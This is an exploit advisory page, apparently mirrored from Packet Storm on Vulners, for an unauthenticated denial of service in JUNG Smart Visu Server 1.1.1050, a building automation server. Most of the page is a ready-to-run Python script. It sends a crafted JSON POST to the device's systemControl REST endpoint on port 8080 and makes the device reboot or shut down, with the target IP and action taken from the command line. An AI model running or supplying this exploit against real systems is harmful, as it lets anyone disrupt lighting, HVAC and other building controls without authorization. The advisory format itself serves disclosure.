Vulners
Lucene search
π JUNG Smart Visu Server 1.1.1050 Denial of Service
ποΈΒ 16 Feb 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 104Β Views
=============================================================================================================================================
| # Title : JUNG Smart Visu Server 1.1.1050 β Unauthenticated Remote Denial of Service |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.jung-group.com/en-DE |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215521/ & ZSL-2026-5971
[+] Summary : A security vulnerability in JUNG Smart Visu Server version 1.1.1050 allows unauthenticated remote attackers to trigger a system reboot or shutdown via a crafted HTTP POST request to a publicly exposed REST API endpoint.
The affected endpoint fails to enforce authentication and authorization controls, permitting direct execution of critical system control commands.
An attacker with network access to the device (default port 8080) can send a single request to disrupt availability, resulting in a denial of service (DoS).
Successful exploitation may cause service interruption in building automation environments, potentially affecting lighting, HVAC, and other connected control systems.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import argparse
ENDPOINT = "/rest/items/liteserver_LiteServer_1_systemControl"
HEADERS = {
"User-Agent": "thricer-engine/1.6",
"Content-Type": "application/json"
}
COMMANDS = {
"reboot": '{"MSG_ID_TYPE":"MSG_REBOOT_REQ"}',
"shutdown": '{"MSG_ID_TYPE":"MSG_HALT_REQ"}'
}
def exploit(target_ip, command_type):
"""
Sends the malicious request to the target server.
"""
url = f"http://{target_ip}:8080{ENDPOINT}"
payload = COMMANDS.get(command_type)
if not payload:
print("[!] Invalid command type. Use 'reboot' or 'shutdown'.")
sys.exit(1)
print(f"[*] Targeting: {url}")
print(f"[*] Command: {command_type.upper()}")
print("[*] Sending malicious packet...")
try:
response = requests.post(url, headers=HEADERS, data=payload, timeout=5)
if response.status_code == 200:
print("[+] Request sent successfully!")
print("[+] If the device is connected, it should be rebooting/shutting down now.")
else:
print(f"[?] Unexpected server response: Status Code {response.status_code}")
print("[?] The device might already be down or unaffected.")
except requests.exceptions.ConnectionError:
print("[!] Connection to server failed. Ensure it is running and the IP is correct.")
except requests.exceptions.Timeout:
print("[!] Request timed out. The server might have already been shut down.")
except Exception as e:
print(f"[!] An unexpected error occurred: {e}")
def banner():
print("""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β JUNG Smart Visu Server 1.1.1050 - DoS Exploit β
β by indoushka β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
if __name__ == "__main__":
banner()
parser = argparse.ArgumentParser(description="DoS exploit for JUNG Smart Visu Server.")
parser.add_argument("target", help="The target server IP address (e.g., 192.168.1.100)")
parser.add_argument("action", choices=["reboot", "shutdown"],
help="The action to perform: 'reboot' to restart, 'shutdown' to stop.")
args = parser.parse_args()
exploit(args.target, args.action)
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7